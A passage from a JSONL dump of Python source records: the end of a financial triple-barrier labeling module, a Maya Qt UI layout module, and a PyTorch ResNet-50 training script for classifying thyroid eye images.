+ diff.loc[i]))\n print(sNeg + diff.loc[i], type(sNeg + diff.loc[i]))\n break\n \n sPos, sNeg = max(0.,pos), min(0.,neg)\n if sNeg <- h:\n sNeg = 0\n tEvents.append(i)\n sEvents.append(i)\n \n if sPos > h:\n sPos = 0\n tEvents.append(i)\n pEvents.append(i)\n\n return pd.DatetimeIndex(tEvents), pd.DatetimeIndex(sEvents), pd.DatetimeIndex(pEvents)\n\n# Adding Vertical Barrier [3.4]\ndef addVerticalBarrier(tEvents, close, numDays=1):\n t1 = close.index.searchsorted(tEvents + pd.Timedelta(days = numDays))\n t1 = t1[t1 < close.shape[0]]\n t1 = (pd.Series(close.index[t1], index = tEvents[:t1.shape[0]]))\n return t1\n\n# Triple-Barrier Labeling Method [3.2]\ndef applyPtSlOnT1(close,events,ptSl,molecule):\n # apply stop loss/profit taking, if it takes place before t1 (end of event)\n events_=events.loc[molecule]\n out = events_[['t1']].copy(deep=True)\n \n if ptSl[0]>0: \n pt = ptSl[0]*events_['trgt']\n else: \n pt = pd.Series(index=events.index) # NaNs\n \n if ptSl[1]>0: \n sl = -ptSl[1]*events_['trgt']\n else: \n sl = pd.Series(index=events.index) # NaNs\n \n for loc,t1 in events_['t1'].fillna(close.index[-1]).iteritems():\n df0 = close[loc:t1] # path prices\n df0 = (df0/close[loc]-1) * events_.at[loc,'side'] # path returns\n\n out.loc[loc,'sl'] = df0[df0 < sl[loc]].index.min() # earliest stop loss\n out.loc[loc,'pt'] = df0[df0 > pt[loc]].index.min() # earliest profit taking\n\n return out\n\n# Gettting Time of First Touch (getEvents) [3.3], [3.6]\ndef getEvents(close, tEvents, ptSl, trgt, minRet, numThreads, t1=False, side=None):\n #1) get target\n trgt = trgt.loc[tEvents]\n trgt = trgt[trgt > minRet] # minRet\n \n #2) get t1 (max holding period)\n if t1 is False:\n \tt1 = pd.Series(pd.NaT, index = tEvents)\n \n #3) form events object, apply stop loss on t1\n if side is None:\n side_, ptSl_ = pd.Series(1.,index = trgt.index), [ptSl[0],ptSl[0]]\n else: \n side_, ptSl_ = side.loc[trgt.index], ptSl[:2]\n \n events = (pd.concat({'t1':t1,'trgt':trgt,'side':side_}, axis = 1).dropna(subset = ['trgt']))\n df0 = mpPandasObj(func = applyPtSlOnT1, pdObj = ('molecule',events.index),\n numThreads = numThreads, close = close, events = events,\n ptSl = ptSl_)\n\n events['t1'] = df0.dropna(how = 'all').min(axis = 1) # pd.min ignores nan\n\n if side is None:\n events = events.drop('side',axis = 1)\n \n return events\n\n# Labeling for side and size [3.5]\ndef getBinsOld(events,close):\n #1) prices aligned with events\n events_ = events.dropna(subset=['t1'])\n px = events_.index.union(events_['t1'].values).drop_duplicates()\n px = close.reindex(px,method='bfill')\n\n #2) create out object\n out = pd.DataFrame(index=events_.index)\n out['ret'] = px.loc[events_['t1'].values].values/px.loc[events_.index]-1\n out['bin'] = np.sign(out['ret'])\n # where out index and t1 (vertical barrier) intersect label 0\n try:\n locs = out.query('index in @t1').index\n out.loc[locs, 'bin'] = 0\n except:\n pass\n return out\n\n# Expanding getBins to Incorporate Meta-Labeling [3.7]\ndef getBins(events, close):\n '''\n Compute event's outcome (including side information, if provided).\n events is a DataFrame where:\n -events.index is event's starttime\n -events['t1'] is event's endtime\n -events['trgt'] is event's target\n -events['side'] (optional) implies the algo's position side\n Case 1: ('side' not in events): bin in (-1,1) <-label by price action\n Case 2: ('side' in events): bin in (0,1) <-label by pnl (meta-labeling)\n '''\n #1) prices aligned with events\n events_ = events.dropna(subset = ['t1'])\n px = events_.index.union(events_['t1'].values).drop_duplicates()\n px = close.reindex(px,method = 'bfill')\n\n #2) create out object\n out = pd.DataFrame(index = events_.index)\n out['ret'] = px.loc[events_['t1'].values].values / px.loc[events_.index] - 1\n\n if 'side' in events_:\n \tout['ret']*=events_['side'] # meta-labeling\n\n out['bin'] = np.sign(out['ret'])\n\n if 'side' in events_:\n \tout.loc[out['ret'] <= 0,'bin'] = 0 # meta-labeling\n\n return out\n\n# Dropping Unnecessary Labels [3.8]\ndef dropLabels(events, minPct=.05):\n # apply weights, drop labels with insufficient examples\n while True:\n df0=events['bin'].value_counts(normalize=True)\n\n if df0.min()>minPct or df0.shape[0]<3:break\n print('dropped label: ', df0.argmin(),df0.min())\n events=events[events['bin']!=df0.argmin()]\n return events\n\ndef df_returns(s):\n arr = np.diff(np.log(s))\n return (pd.Series(arr, index=s.index[1:]))\n\ndef df_rolling_autocorr(df, window, lag=1):\n \"\"\"Compute rolling column-wise autocorrelation for a DataFrame.\"\"\"\n\n return (df.rolling(window=window)\n .corr(df.shift(lag))) # could .dropna() here","sub_path":"lopez/labeling.py","file_name":"labeling.py","file_ext":"py","file_size_in_byte":6455,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"42342755","text":"from maya.app.flux.commonImports import *\nimport maya.app.flux.ui.core as fui\nfrom maya.app.flux.ui.core import pix\n\nimport maya.OpenMayaUI as omui\nimport types\n\nclass LayoutInterface(object):\n @staticmethod\n def wrap(obj, layoutType):\n fui.registerQtObject(obj)\n obj.layoutType = layoutType\n obj.childLayouts = []\n obj.parentLayout = None\n obj.parentableLayout = None\n\n toBeImplemented = ['updateHeight']\n\n for f in toBeImplemented:\n if not hasattr(obj, f):\n raise NotImplementedError(\"Function not implemented: \" + f)\n\n LayoutInterface.addMethod(obj, 'resizeUpstream')\n LayoutInterface.addMethod(obj, 'resizeDownstream')\n LayoutInterface.addMethod(obj, 'getFullName')\n if layoutType != 'stackedLayout':\n LayoutInterface.addMethod(obj, 'addWidget')\n LayoutInterface.addMethod(obj, 'addSpacing')\n LayoutInterface.addMethod(obj, 'addStretch')\n LayoutInterface.addMethod(obj, 'setAsMelParent')\n\n @staticmethod\n def addMethod(obj, methodName):\n method = LayoutInterface.__dict__[methodName]\n obj.__dict__[methodName] = types.MethodType(method, obj, LayoutInterface) \n\n def resizeUpstream(self):\n self.updateHeight()\n if self.parentLayout is not None:\n self.parentLayout.resizeUpstream()\n\n def resizeDownstream(self):\n for c in self.childLayouts:\n c.resizeDownstream()\n\n def getFullName(self):\n if self.parentableLayout is None:\n raise TypeError('Class not parentable: %s' % self.__class__.__name__)\n\n return omui.MQtUtil.fullName( long(unwrapInstance(self.parentableLayout)[0]) )\n\n def addWidget(self, widget, stretchFactor=0, alignment=0):\n if self.parentableLayout is None:\n raise TypeError('Class not parentable: %s' % self.__class__.__name__)\n\n self.parentableLayout.addWidget(widget, stretchFactor, alignment)\n self.childLayouts.append(widget)\n if hasattr(widget, 'parentLayout'):\n widget.parentLayout = self\n\n def addSpacing(self, value):\n if self.parentableLayout is None:\n raise TypeError('Class not parentable: %s' % self.__class__.__name__)\n\n self.parentableLayout.addSpacing(value)\n\n def addStretch(self, factor=1):\n if self.parentableLayout is None:\n raise TypeError('Class not parentable: %s' % self.__class__.__name__)\n\n self.parentableLayout.addStretch(factor)\n\n def setAsMelParent(self):\n if self.parentableLayout is None:\n return\n cmds.setParent(self.getFullName())\n\n# Top Level Mandatory Layout\nclass Layout(qt.QWidget):\n visibilityChanged = qt.Signal(bool)\n def __init__(self):\n super(Layout, self).__init__()\n LayoutInterface.wrap(self, 'wrapper')\n\n self.setFixedHeight(pix(10))\n self.contents = Contents(self)\n\n self.parentName = cmds.setParent(q=True)\n self.addWidgetToParent(self.parentName, self)\n\n self.parent().children()[0].setContentsMargins(0,0,0,0)\n\n self.parentableLayout = self.contents.layout()\n\n def updateHeight(self, childHeight=None):\n if childHeight is None:\n height = self.contents.sizeHint().height()\n \n if height == 0:\n self.setContentsMargins(0,0,0,0)\n self.contents.setFixedHeight(height)\n self.setFixedHeight(height)\n else:\n self.setContentsMargins(0,pix(1),0,0)\n self.contents.setFixedHeight(height+2)\n self.setFixedHeight(height+2)\n\n def resizeEvent(self, e):\n super(Layout, self).resizeEvent(e)\n if self.rect().width() != self.contents.rect().width():\n self.contents.setFixedWidth(self.rect().width())\n\n def addWidgetToParent(self, parentName, widget):\n currentParent = omui.MQtUtil.findLayout(parentName)\n currentParent = wrapInstance(long(currentParent), qt.QWidget)\n layout = currentParent.layout()\n layout.addWidget(widget)\n\n def hideEvent(self, e):\n qt.QWidget.hideEvent(self, e)\n self.visibilityChanged.emit(False)\n\n def showEvent(self, e):\n qt.QWidget.showEvent(self, e)\n self.visibilityChanged.emit(True)\n\nclass Contents(qt.QWidget):\n visibilityChanged = qt.Signal(bool)\n def __init__(self, parent):\n super(Contents, self).__init__(parent)\n self.setContentsMargins(0,0,0,0)\n fui.setVLayout(self,pix(2),0,0,0,0)\n\n fui.registerQtObject(self)\n fui.registerQtObject(self.layout())\n\n def hideEvent(self, e):\n qt.QWidget.hideEvent(self, e)\n self.visibilityChanged.emit(False)\n\n def showEvent(self, e):\n qt.QWidget.showEvent(self, e)\n self.visibilityChanged.emit(True)\n\nclass Tab(qt.QWidget):\n visibilityChanged = qt.Signal(bool)\n def __init__(self):\n super(Tab, self).__init__()\n LayoutInterface.wrap(self, 'tab')\n\n fui.setWidgetWindowColor(self, [68,68,68])\n self.setAutoFillBackground(True)\n\n fui.setVLayout(self,pix(2),pix(5),pix(2),pix(5),pix(2))\n #self.layout().addSpacing()\n\n fui.registerQtObject(self.layout())\n self.parentableLayout = self.layout()\n\n def updateHeight(self):\n height = self.sizeHint().height()\n self.setFixedHeight(height)\n\n def hideEvent(self, e):\n qt.QWidget.hideEvent(self, e)\n self.visibilityChanged.emit(False)\n\n def showEvent(self, e):\n qt.QWidget.showEvent(self, e)\n self.visibilityChanged.emit(True)\n\nclass TabLayout(qt.QTabWidget):\n visibilityChanged = qt.Signal(bool)\n def __init__(self, parent):\n super(TabLayout, self).__init__()\n LayoutInterface.wrap(self, 'tabLayout')\n\n self.currentChanged.connect(self.currentTabChanged)\n\n self.setStyleSheet('QTabWidget{border:none;}')\n\n self.stackedWidget = qt.QStackedWidget()\n fui.registerQtObject(self.stackedWidget)\n fui.registerQtObject(self.stackedWidget.children()[0])\n\n parent.addWidget(self)\n parent.addWidget(self.stackedWidget)\n\n def addTabNamed(self, widget, name):\n if widget.layoutType != 'tab':\n return\n self.childLayouts.append(widget)\n if hasattr(widget, 'parentLayout'):\n widget.parentLayout = self\n self.addTab(qt.QWidget(), name)\n self.stackedWidget.addWidget(widget)\n \n def updateHeight(self):\n height = self.childLayouts[self.currentIndex()].sizeHint().height()\n self.setFixedHeight(pix(20)) \n self.stackedWidget.setFixedHeight(height) \n\n def currentTabChanged(self, index):\n self.stackedWidget.setCurrentIndex(index)\n self.resizeUpstream()\n\n def hideEvent(self, e):\n qt.QTabWidget.hideEvent(self, e)\n self.visibilityChanged.emit(False)\n\n def showEvent(self, e):\n qt.QTabWidget.showEvent(self, e)\n self.visibilityChanged.emit(True)\n\nclass FrameLayout(fui.FrameWidget):\n visibilityChanged = qt.Signal(bool)\n def __init__(self, text, expanded=False):\n super(FrameLayout, self).__init__(text, expanded)\n LayoutInterface.wrap(self, 'frameLayout')\n\n fui.registerQtObject(self.layout())\n fui.registerQtObject(self.contents)\n fui.registerQtObject(self.contents.layout())\n\n self.parentableLayout = self.contents.layout()\n\n def updateHeight(self):\n if self.expanded:\n height = self.contents.sizeHint().height()\n self.setFixedHeight(height+pix(22))\n else:\n self.setFixedHeight(pix(18))\n\n def switchMode(self):\n super(FrameLayout, self).switchMode()\n self.resizeUpstream()\n\n def setEnabled(self, enabled):\n self.contents.setEnabled(enabled)\n\n def hideEvent(self, e):\n fui.FrameWidget.hideEvent(self, e)\n self.visibilityChanged.emit(False)\n\n def showEvent(self, e):\n fui.FrameWidget.showEvent(self, e)\n self.visibilityChanged.emit(True)\n\nclass HorizontalLayout(qt.QWidget):\n visibilityChanged = qt.Signal(bool)\n def __init__(self, offset=0, height=None, parent=None):\n super(HorizontalLayout, self).__init__(parent)\n LayoutInterface.wrap(self, 'horizontalLayout')\n fui.setHLayout(self,pix(2),offset,0,0,0)\n\n self.specificHeight = height\n\n if self.specificHeight is not None:\n self.setFixedHeight(self.specificHeight)\n\n fui.registerQtObject(self.layout())\n self.parentableLayout = self.layout()\n\n def updateHeight(self):\n if self.specificHeight is not None:\n self.setFixedHeight(self.specificHeight)\n else:\n self.setFixedHeight(self.sizeHint().height())\n\n def hideEvent(self, e):\n qt.QWidget.hideEvent(self, e)\n self.visibilityChanged.emit(False)\n\n def showEvent(self, e):\n qt.QWidget.showEvent(self, e)\n self.visibilityChanged.emit(True)\n\nclass VerticalLayout(qt.QWidget):\n visibilityChanged = qt.Signal(bool)\n def __init__(self, offset=0, height=None, parent=None):\n super(VerticalLayout, self).__init__(parent)\n LayoutInterface.wrap(self, 'verticalLayout')\n fui.setVLayout(self,pix(2),0,offset,0,0)\n\n self.specificHeight = height\n\n if self.specificHeight is not None:\n self.setFixedHeight(self.specificHeight)\n\n fui.registerQtObject(self.layout())\n self.parentableLayout = self.layout()\n\n def updateHeight(self):\n if self.specificHeight is not None:\n self.setFixedHeight(self.specificHeight)\n else:\n self.setFixedHeight(self.sizeHint().height())\n\n def hideEvent(self, e):\n qt.QWidget.hideEvent(self, e)\n self.visibilityChanged.emit(False)\n\n def showEvent(self, e):\n qt.QWidget.showEvent(self, e)\n self.visibilityChanged.emit(True)\n\nclass IndentLayout(qt.QWidget):\n visibilityChanged = qt.Signal(bool)\n def __init__(self, name='', parent=None, autoStretch=True):\n super(IndentLayout, self).__init__(parent)\n LayoutInterface.wrap(self, 'indentLayout')\n fui.setHLayout(self,0,0,0,0,0)\n\n w = fui.widgetWithLayout('H',0,0,0,0,0)\n w.setFixedWidth(pix(148))\n w.layout().addStretch()\n\n self.label = qt.QLabel(name.strip())\n self.label.setMargin(0)\n self.label.setContentsMargins(0,0,pix(2),0)\n w.layout().addWidget(self.label)\n self.layout().addWidget(w, 0)\n\n self.contents = fui.widgetWithLayout('H',0,0,0,0,0)\n self.layout().addSpacing(pix(2))\n\n if autoStretch:\n self.layout().addWidget(self.contents, 0)\n self.layout().addStretch(1)\n else:\n self.layout().addWidget(self.contents, 1)\n\n self.layout().addSpacing(pix(16))\n\n fui.registerQtObject(self.layout())\n fui.registerQtObject(self.contents)\n fui.registerQtObject(self.contents.layout())\n self.parentableLayout = self.contents.layout()\n\n def updateHeight(self):\n pass\n\n def setEnabled(self, enabled):\n self.contents.setEnabled(enabled)\n\n def hideEvent(self, e):\n qt.QWidget.hideEvent(self, e)\n self.visibilityChanged.emit(False)\n\n def showEvent(self, e):\n qt.QWidget.showEvent(self, e)\n self.visibilityChanged.emit(True)\n\nclass StackedLayout(qt.QStackedWidget):\n visibilityChanged = qt.Signal(bool)\n def __init__(self, parent=None):\n super(StackedLayout, self).__init__(parent)\n self.addPage = self.addWidget\n LayoutInterface.wrap(self, 'stackedLayout')\n fui.registerQtObject(self.children()[0])\n\n def updateHeight(self):\n height = self.currentWidget().sizeHint().height()\n self.setFixedHeight(height)\n\n def setIndex(self, i):\n self.setCurrentIndex(i)\n self.resizeUpstream()\n\n def hideEvent(self, e):\n qt.QStackedWidget.hideEvent(self, e)\n self.visibilityChanged.emit(False)\n\n def showEvent(self, e):\n qt.QStackedWidget.showEvent(self, e)\n self.visibilityChanged.emit(True)\n\nclass StackedPage(qt.QWidget):\n visibilityChanged = qt.Signal(bool)\n def __init__(self, parent=None):\n super(StackedPage, self).__init__(parent)\n LayoutInterface.wrap(self, 'stackedPage')\n fui.setVLayout(self,pix(2),0,0,0,0)\n fui.registerQtObject(self.layout())\n self.parentableLayout = self.layout()\n\n def updateHeight(self):\n self.setFixedHeight(self.sizeHint().height())\n\n def hideEvent(self, e):\n qt.QWidget.hideEvent(self, e)\n self.visibilityChanged.emit(False)\n\n def showEvent(self, e):\n qt.QWidget.showEvent(self, e)\n self.visibilityChanged.emit(True)\n\nclass ZeroHBoxLayout(qt.QHBoxLayout):\n def __init__(self, parent=None):\n super(ZeroHBoxLayout, self).__init__(parent)\n self.setContentsMargins(0,0,0,0)\n self.setSpacing(0)\n\nclass ZeroVBoxLayout(qt.QVBoxLayout):\n def __init__(self, parent=None):\n super(ZeroVBoxLayout, self).__init__(parent)\n self.setContentsMargins(0,0,0,0)\n self.setSpacing(0)\n\nclass IconButton(qt.QPushButton):\n def __init__(self, buttonName, iconName, parent=None):\n super(IconButton, self).__init__(buttonName, parent=parent)\n self.setIcon(fui.getIconFromName(iconName))\n self.setFixedHeight(pix(25))\n\nclass RadioImageGroup(qt.QWidget):\n clicked = qt.Signal(int)\n def __init__(self, icons, currentIndex=0, parent=None):\n super(RadioImageGroup, self).__init__(parent)\n self.setLayout(qt.QHBoxLayout())\n self.layout().setContentsMargins(0,0,0,0)\n self.layout().setSpacing(0)\n self.buttons = []\n for i, icon in enumerate(icons):\n btn = fui.ImageButton(icon)\n btn.setBackgroundColor(qt.QColor(64, 134, 169))\n btn.clicked.connect(lambda i=i: self.radioClicked(i))\n self.buttons.append(btn)\n self.layout().addWidget(btn)\n\n\n self.buttons[currentIndex].setHighlighted(True)\n self.currentIndex = currentIndex\n\n def radioClicked(self, index):\n self.setIndex(index)\n self.clicked.emit(index)\n \n\n def setIndex(self, index):\n self.buttons[self.currentIndex].setHighlighted(False)\n self.currentIndex = index\n self.buttons[self.currentIndex].setHighlighted(True)\n\n\nclass ToolButton(fui.ImageButton):\n def __init__(self, imageName, **kwargs):\n super(ToolButton, self).__init__(imageName, **kwargs)\n\n\n\n\n\n\n\n\n\n# ===========================================================================\n# Copyright 2018 Autodesk, Inc. All rights reserved.\n#\n# Use of this software is subject to the terms of the Autodesk license\n# agreement provided at the time of installation or download, or which\n# otherwise accompanies this software in either electronic or hard copy form.\n# ===========================================================================\n","sub_path":"Maya2019/Python/Lib/site-packages/maya/app/flux/ae/ui.py","file_name":"ui.py","file_ext":"py","file_size_in_byte":15103,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"143417367","text":"# Adapted from https://github.com/pytorch/examples/blob/master/imagenet/main.py\nimport argparse\nimport os\nimport shutil\nimport time\nimport numpy as np\n\nimport torch\nimport torch.nn as nn\nimport torch.backends.cudnn as cudnn\nimport torch.optim\nimport torch.utils.data\nimport resnet\nfrom sklearn.metrics import roc_auc_score\nfrom scipy import special\n\nimport TAO_loader\n\nfrom tensorboardX import SummaryWriter\n\nparser = argparse.ArgumentParser(description='TAO training')\nparser.add_argument('--epochs', default=160, type= int, metavar='N', help='number of total epochs')\nparser.add_argument('--start-epoch', default=0, type=int, metavar='N', help='manual epoch number (useful on restarts)')\nparser.add_argument('--workers',default=6,type=int, metavar='N')\n# parser.add_argument('--num_classes', default=2, type=int, metavar='N')\nparser.add_argument('-b', '--batch_size',default=64, type=int,metavar='N')\nparser.add_argument('--lr',default=0.01,type = float, metavar='LR')\nparser.add_argument('--momentum', default=0.9, type=float, metavar='M', help='momentum')\nparser.add_argument('--weight-decay', '--wd', default=1e-4, type=float, metavar='W',\n help='weight decay (default: 1e-4)')\nparser.add_argument('--print_freq', default=100, type=int, metavar='N', help='print frequency (default: 100)')\nparser.add_argument('--sum_freq', default=100, type=int, metavar='N', help='summary frequency (default: 100)')\nparser.add_argument('--save_freq', default=5, type=int, metavar='N', help='save checkpoint frequency (default: 5)')\nparser.add_argument('--resume', default='', type=str, metavar='PATH', help='path to latest checkpoint (default: none)')\nparser.add_argument('-sp', '--summary_path', default='', type=str, metavar='PATH', help='path to store summary event file')\nparser.add_argument('-cp','--checkpoint_path', default='', type=str, metavar='PATH', help='path to store checkpoint')\nparser.add_argument('-op', '--output_path', default='', type=str, metavar='PATH', help='path to store test output')\nparser.add_argument('--suffix', default ='', type = str, help = 'suffix of summmary and checkpoint dir')\nparser.add_argument('--lr_path', default='', type=str, metavar='PATH', help='path to lr file')\n\nparser.add_argument('--threshold',default=0.5,type = float, metavar='THRESHOLD')\n\nparser.add_argument('--trainval_file', default='/DB/rhome/zdcheng/workspace/hyperthyreosis_eye/classification/all_trainval.json',\n type=str, metavar='PATH', help='path to train json file')\nparser.add_argument('--valfold', default=0,\n type=int, metavar='N', help='fold Indicator')\nparser.add_argument('--data_root',default='/DATA5_DB8/data/zdcheng/hyperthyreosis_eye/class_arraydata', type = str,\n metavar='PATH',help='path to image data root')\nparser.add_argument('-e', '--evaluate', dest='evaluate', action='store_true', help='evaluate model on validation set')\n\nparser.add_argument('--fake', dest='fake', action='store_true', help='use fake data')\n\nbest_acc = 0\nbest_prec = 0\nbest_recall = 0\nbest_F1 = 0\nbest_AUC = 0\n\ndef main():\n global args, best_acc, best_prec, best_recall, best_F1, best_AUC, writer\n args = parser.parse_args()\n\n args.summary_path = os.path.join(args.summary_path, args.suffix)\n if not os.path.exists(args.summary_path):\n os.makedirs(args.summary_path)\n writer = SummaryWriter(args.summary_path)\n\n args.checkpoint_path = os.path.join(args.checkpoint_path, args.suffix)\n if not os.path.exists(args.checkpoint_path):\n os.makedirs(args.checkpoint_path)\n\n args.output_path = os.path.join(args.output_path, args.suffix)\n if not os.path.exists(args.output_path):\n os.makedirs(args.output_path)\n\n model = resnet.resnet50(pretrained=True)\n model.fc = nn.Linear(2048, 1)\n model = torch.nn.DataParallel(model).cuda()\n\n criterion = nn.BCEWithLogitsLoss()\n optimizer = torch.optim.SGD(model.parameters(), args.lr,\n momentum=args.momentum,\n weight_decay=args.weight_decay)\n\n if args.resume:\n if os.path.isfile(args.resume):\n print(\"=> loading checkpoint '{}'\".format(args.resume))\n checkpoint = torch.load(args.resume)\n args.start_epoch = checkpoint['epoch'] + 1\n best_acc = checkpoint['best_acc']\n best_prec = checkpoint['best_prec']\n best_recall = checkpoint['best_recall']\n best_F1 = checkpoint['best_F1']\n best_AUC = checkpoint['best_AUC']\n model.load_state_dict(checkpoint['model_state'])\n optimizer.load_state_dict(checkpoint['optimizer'])\n print(\"=> loaded checkpoint '{}' (epoch {})\"\n .format(args.resume, checkpoint['epoch']))\n\n else:\n print(\"=> no checkpoint found at '{}'\".format(args.resume))\n raise RuntimeError()\n\n train_dataset = TAO_loader.TAO(args.trainval_file, args.data_root, mode='train', val_fold=args.valfold, fake=False )\n val_dataset = TAO_loader.TAO(args.trainval_file, args.data_root, mode='val', val_fold=args.valfold, fake=False )\n train_loader = torch.utils.data.DataLoader(train_dataset, batch_size=args.batch_size,\n shuffle=True, num_workers=args.workers, pin_memory=True)\n global epoch_len\n epoch_len = len(train_loader)\n val_loader = torch.utils.data.DataLoader(val_dataset,\n batch_size=int(args.batch_size * 0.5), shuffle=False,\n num_workers=args.workers, pin_memory=True)\n Acc, Prec, Recall, F1, AUC = validate(val_loader, model, criterion, -1)\n for epoch in range(args.start_epoch, args.epochs):\n adjust_learning_rate(optimizer, epoch, args.lr_path)\n\n # train for one epoch\n train(train_loader, model, criterion, optimizer, epoch)\n\n # evaluate on validation set\n Acc,Prec,Recall,F1,AUC = validate(val_loader, model, criterion, epoch)\n\n # remember best prec@1 and save checkpoint\n is_best = Acc > best_acc\n best_acc = max(Acc, best_acc)\n best_prec = max(Prec, best_prec)\n best_recall = max(Recall, best_recall)\n best_F1 = max(F1, best_F1)\n best_AUC = max(AUC, best_AUC)\n\n save_checkpoint({\n 'epoch': epoch,\n #'arch': args.arch,\n 'model_state': model.state_dict(),\n 'best_acc': best_acc,\n 'best_prec': best_prec,\n 'best_recall': best_recall,\n 'best_F1': best_F1,\n 'best_AUC': best_AUC,\n 'optimizer' : optimizer.state_dict(),\n }, is_best, epoch)\n\ndef train(trainloader, model, criterion, optimizer, epoch):\n\n batch_time = AverageMeter()\n data_time = AverageMeter()\n losses = AverageMeter()\n accMeter = AverageMeter()\n\n model.train()\n\n end = time.time()\n\n for i, (input, target) in enumerate(trainloader):\n # measure data loading time\n data_time.update(time.time() - end)\n\n input, target = input.cuda(), target.to(torch.float32).cuda()\n\n # compute output\n output = model(input)\n loss = criterion(output.view(output.size(0)), target)\n\n # measure accuracy and record loss\n acc = accuracy(output.detach(), target, args.threshold)\n losses.update(loss.item(), input.size(0))\n accMeter.update(acc, input.size(0))\n\n # compute gradient and do SGD step\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n\n # measure elapsed time\n batch_time.update(time.time() - end)\n end = time.time()\n\n if i % args.print_freq == 0:\n print('Epoch: [{0}][{1}/{2}]\\t'\n 'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\\t'\n 'Data {data_time.val:.3f} ({data_time.avg:.3f})\\t'\n 'Loss {loss.val:.4f} ({loss.avg:.4f})\\t'\n 'Acc {accMeter.val:.3f} ({accMeter.avg:.3f})'.format(\n epoch, i, len(trainloader), batch_time=batch_time,\n data_time=data_time, loss=losses, accMeter=accMeter))\n\n global_step = epoch * epoch_len + i\n if i % args.sum_freq == 0:\n writer.add_scalar('train_loss', loss.item(), global_step)\n writer.add_scalar('train_acc', acc, global_step)\n global_step = epoch * epoch_len + epoch_len - 1\n writer.add_scalar('epochavg_train_loss', losses.avg, global_step)\n writer.add_scalar('epochavg_train_acc', accMeter.avg, global_step)\n\ndef validate(val_loader, model, criterion, epoch):\n # epoch < 0 means no summary\n batch_time = AverageMeter()\n losses = AverageMeter()\n accMeter = AverageMeter()\n\n # switch to evaluate mode\n model.eval()\n\n end = time.time()\n for i, (input, target) in enumerate(val_loader):\n input, target = input.cuda(), target.to(torch.float32).cuda()\n\n # compute output\n output = model(input)\n loss = criterion(output.view(output.size(0)), target)\n\n # measure accuracy and record loss\n acc = accuracy(output.detach(), target, args.threshold)\n losses.update(loss.item(), input.size(0))\n accMeter.update(acc, input.size(0))\n\n # measure elapsed time\n batch_time.update(time.time() - end)\n end = time.time()\n\n if i % args.print_freq == 0:\n print('Val: [{0}/{1}]\\t'\n 'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\\t'\n 'Loss {loss.val:.4f} ({loss.avg:.4f})\\t'\n 'Acc {accMeter.val:.3f} ({accMeter.avg:.3f})'.format(\n i, len(val_loader), batch_time=batch_time, loss=losses,\n accMeter=accMeter))\n if i == 0:\n out_array = output.detach().cpu().numpy()\n target_array = target.detach().cpu().numpy()\n else:\n out_array = np.concatenate((out_array, output.detach().cpu().numpy()), axis=0)\n target_array = np.concatenate( (target_array, target.detach().cpu().numpy()), axis = 0)\n out_array = out_array.reshape(out_array.shape[0])\n Prec,Recall,F1 = precision_recall_F1(out_array,target_array,threshold=args.threshold)\n AUC = AUROC(out_array, target_array)\n\n print(' * Acc {accMeter.avg:.3f} '.format(accMeter=accMeter))\n print(' * Prec {:.4f}'.format(Prec))\n print(' * Recall {:.4f}'.format(Recall))\n print(' * F1 {:.4f}'.format(F1))\n print(' * AUC {:.4f}'.format(AUC))\n\n\n if epoch >= 0:\n global_step = epoch * epoch_len + epoch_len - 1\n writer.add_scalar('val_loss', losses.avg, global_step)\n writer.add_scalar('val_acc', accMeter.avg, global_step)\n writer.add_scalar('val_prec', Prec, global_step)\n writer.add_scalar('val_recall', Recall, global_step)\n writer.add_scalar('val_F1', F1, global_step)\n writer.add_scalar('val_AUC', AUC, global_step)\n\n print('Saving output:')\n np.save(os.path.join(args.output_path, 'out{:0>3}.npy'.format(epoch)), out_array)\n\n return accMeter.avg,Prec,Recall,F1,AUC\n\n\ndef adjust_learning_rate(optimizer, epoch, file_path):\n f = open(file_path)\n lines = f.readlines()\n lines = [i.strip() for i in lines]\n lines = [i for i in lines if i]\n f.close()\n\n tmp_lr = 0.00001\n for line in lines:\n t, l = line.split()\n t = int(t)\n l = float(l)\n tmp_lr = l\n\n if epoch < t:\n lr = l\n break\n else:\n lr = tmp_lr\n\n for param_group in optimizer.param_groups:\n param_group['lr'] = lr\n global_step = epoch * epoch_len\n print('epoch' + str(epoch) + ' learning rate: ' + str(lr) + '\\n')\n writer.add_scalar('lr', lr, global_step)\n\ndef accuracy_old(output, target, topk=(1,)):\n \"\"\"Computes the precision@k for the specified values of k\"\"\"\n maxk = max(topk)\n batch_size = target.size(0)\n\n _, pred = output.topk(maxk, 1, True, True)\n pred = pred.t()\n correct = pred.eq(target.view(1, -1).expand_as(pred))\n\n res = []\n for k in topk:\n correct_k = correct[:k].view(-1).float().sum(0, keepdim=True)\n res.append(correct_k.mul_(100.0 / batch_size))\n return res\n\ndef accuracy(output, target, threshold):\n logits = torch.sigmoid(output) #torch.float32\n logits = logits.view(logits.size(0))\n logits_n = logits.detach().cpu().numpy() #np.float32\n logits_n = (logits_n >= threshold).astype(np.int64) #np.int64\n target_n = target.detach().cpu().numpy() #np.int64\n correct_num = np.sum((logits_n == target_n).astype(np.int64)) #np.int64\n acc = correct_num/output.size(0) #np.float64\n acc = float(acc) #float\n return acc\n\ndef precision_recall_F1(output, target, threshold):\n '''\n :param output:shape (N,), no sigmoid, numpy array, float32\n :param target: shape(N,), numpy array int64\n :param threshold: python number\n :return: precision recall F1 all float python number\n '''\n logits_n = special.expit(output)\n logits_n = (logits_n >= threshold).astype(np.int64) # np.int64\n target_n = target # np.int64\n\n TP = np.sum(target_n.astype(np.bool) & logits_n.astype(np.bool))\n\n precision = float(TP/np.sum(logits_n))\n recall = float(TP/np.sum(target_n))\n F1 = 2*precision*recall / (precision + recall)\n\n return precision, recall, F1\n\ndef AUROC(output, target):\n logits_n = special.expit(output)\n target_n = target # np.int64\n auroc = roc_auc_score(target_n, logits_n)\n return auroc\n\nclass AverageMeter(object):\n \"\"\"Computes and stores the average and current value\"\"\"\n def __init__(self):\n self.reset()\n\n def reset(self):\n self.val = 0\n self.avg = 0\n self.sum = 0\n self.count = 0\n\n def update(self, val, n=1):\n self.val = val\n self.sum += val * n\n self.count += n\n self.avg = self.sum / self.count\n\ndef save_checkpoint(state, is_best, epoch):\n if is_best:\n filepath = os.path.join(args.checkpoint_path, 'model{:0>3}best.pth'.format(epoch))\n torch.save(state, 